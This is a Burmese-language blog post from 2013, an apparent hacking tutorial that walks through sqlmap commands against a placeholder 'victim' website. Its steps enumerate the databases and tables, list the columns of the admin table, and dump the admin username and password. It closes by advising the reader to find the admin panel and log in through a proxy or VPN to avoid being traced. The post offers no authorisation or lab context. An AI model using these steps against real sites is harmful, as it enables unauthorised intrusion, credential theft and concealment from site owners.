Wednesday, May 15, 2013

Hack website using Backtrack (sqlmap)

ကဲ ေအာက္မွာ ကြ်န္ေတာ္ အဆင့္ေလးေတြနဲ႔ ျပေပးထားပါတယ္ Sqlmap Tool ေလးသံုးၿပီး

Backtrack နဲ႔ Website Hack ရေအာင္ဗ်ာ... ေအာက္က အဆင့္ေတြ အတိုင္း လုပ္ေဆာင္သြားပါ...



1. Backtrack terminal ကိုဖြင့္ၿပီး cd /pentest/database/sqlmap လို႔ရိုက္ၿပီး Enter ႏွိပ္ပါ......
    သင့္ Terminal ထဲမွာ sqlmap ပြင့္သြားပါမည္.....


sql map 1




2. vulnerable site ကိုရွာပါ (ကြ်န္ေတာ့ဆီမွာ အေစာကတည္းက ရွိၿပီးသားပါ)
sql map 2

3. ဒီ Command ကို Terminal ထဲမွာ ရိုက္ၿပီး Enter ႏွိပ္ပါ..(အေပၚပံုကိုၾကည့္ပါ)

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs


4. Website ရဲ႕ Database Name ကို သင္ရသြားပါလိမ့္မည္.....

sql map 3
    aj နဲ႔ information_schema  ဆုိတာ ႏွစ္ခုကို ကြ်န္ေတာ္ရသြားပါၿပီ

    ကြ်န္ေတာ္ တို႔ အခု aj ကို ေရြးလိုက္ပါ့မယ္


5. ဒီ database 2 ခုရဲ႕ Table ကိုယူပါ..... ဒီလိုလုပ္ဖို႔ ေအာက္က Command ကုိ Terminal  ထဲမွာ ရိုက္ Enter....
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D  (database name) –tables


6. aj database က Table ေတြကို ကြ်န္ေတာ္တို႔ ယူပါမယ္..... ေအာက္က Command ေလးရိုက္ေလးလိုက္

    ပါဦး.......
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables

sql map 4



7. aj databas ထဲမွာ သိမ္းထားတဲ႔ Table list ကို သင္ရသြားပါလိမ့္မယ္ ေအာက္ပံုကိုၾကည့္ပါ

sql map 5



8. admin table ထဲက Column ေတြကို ယူပါမယ္ .... ေအာက္မွာ Command ရိုက္ပါ
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns
sql map 7
     Column ေတြထဲမွာ ကြ်န္ေတာ္တို႔ Username နဲ႔ Password ကိုျမင္ရပါၿပီ

9. Admin Password ကို ယူရေအာင္ဗ်ာ... ေအာက္မွာ Command ရိုက္ပါ..
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump
Website ရဲ႕ Username နဲ႔ Password ကို ရၿပီဗ်ိဳ႕ ထသာကေပေတာ့ !
sql map 9
   
Website ထဲကို သင္ Admin အျဖစ္နဲ႔ ဝင္ေတာ့မည္ ဆုိလွ်င္   Website ရဲ႕ Admin Panel ကိုရွာၿပီး proxy/vpn သံုးပါ

REF: HackForSec

0 comments:

Post a Comment

ျမန္မာ အိုင္တီ ၿမိဳ႕ေတာ္ သို႔ ၀င္ေရာက္အားေပး သူမ်ားကို အထူးေက်းဇူးတင္ပါသည္။

FB comments